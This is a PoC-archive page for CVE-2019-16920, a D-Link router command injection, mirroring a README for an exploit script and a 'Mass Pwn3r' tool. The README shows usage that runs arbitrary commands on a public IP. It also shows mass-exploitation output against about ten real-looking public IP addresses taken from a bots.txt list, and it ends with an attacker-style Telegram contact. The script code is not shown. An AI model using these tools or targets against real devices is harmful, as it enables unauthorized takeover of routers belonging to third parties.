Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-16920 PoC — 多款D-Link产品操作系统命令注入漏洞

Source
Associated Vulnerability
Title:多款D-Link产品操作系统命令注入漏洞 (CVE-2019-16920)
Description:D-Link DIR-655C等都是中国台湾友讯(D-Link)公司的一款无线路由器。 多款D-Link产品中存在操作系统命令注入漏洞。攻击者可利用该漏洞注入命令,进而入侵系统。以下产品及版本受到影响:D-Link DIR-655C;DIR-866L;DIR-652;DHP-1565等。
Description
Exploit and Mass Pwn3r for CVE-2019-16920
Readme
# 0day exploit for Multiple D-Link Routers
Vulnerability was found in latest firmware of the following D-Link products:
    DIR-655
    DIR-866L
    DIR-652
    DHP-1565

# Current Description

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.

# Usage CVE-2019-16920.py:
```
root@kali:~# python3 CVE-2019-16920.py 195.208.166.41 8081 ls
[*]Sending payload
[*]Exploited!
root@kali:~#
```

# Usage CVE-2019-16920-MassPwn3r.py:
```
root@kali:~# python3 CVE-2019-16920-MassPwn3r.py bots.txt 8081 id
[*]Exploiting:  195.208.166.41
[!]Unable to connect to host
[!]Unable to connect to host
[*]Exploiting:  83.243.166.37
[*]Exploiting:  74.95.133.33
[*]Exploiting:  97.89.64.118
[*]Exploiting:  66.162.68.154
[!]Unable to connect to host
[*]Exploiting:  72.47.152.161
[*]Exploiting:  97.93.250.209
[*]Exploiting:  183.207.196.64
root@kali:~#
```

# Contacts:
Telegram:```@eth_hacker0x18```
File Snapshot

[4.0K] /data/pocs/64f09a5269ffdb9484e06ddf8cee3bb0ed274899 ├── [ 314] bots.txt ├── [2.1K] CVE-2019-16920-MassPwn3r.py ├── [1.7K] CVE-2019-16920.py └── [1.3K] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.